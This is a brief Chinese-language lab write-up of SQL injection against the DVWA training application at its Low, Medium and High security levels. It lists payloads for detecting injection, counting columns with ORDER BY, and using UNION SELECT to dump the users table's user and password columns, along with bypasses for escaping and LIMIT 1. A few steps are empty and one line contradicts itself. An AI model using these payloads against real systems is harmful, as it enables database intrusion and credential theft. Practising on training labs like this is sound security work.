Low
一、判断注入类型
1、输入1,查询成功
2、输入1' or 1='1查询成功
二、查询数据库中字段数
1、输入
1' or 1=1 order by 1# 查询失败
1' or 1=1 order by 2#均查询成功
2、输入1' or 1=1 order by 3#
判断数据库语句中只有两个字段名,First name和Surname
三、查询数据库的库名
输入'union select database(),user()'
查询到当前数据库名为dvwa
四、查询数据库中表名称
五、获取表中字段名
'union select 1,group_concat(column_name) from information_schema.columnswhere table_name=’users’#
六、尝试获取user及password
'union select user,password from users#
七、尝试破解口令
Medium
查看源码发现特殊字符被mysqli_real_escape_string函数转义
一、输入1' or 1=1 #
发现‘’被函数转义
二、输入1 or 1=1# 查询成功
High
查看源码发现相比于medium知识添加了LIMIT1,可通过#将其注释
'union select user,password from users#成功注入
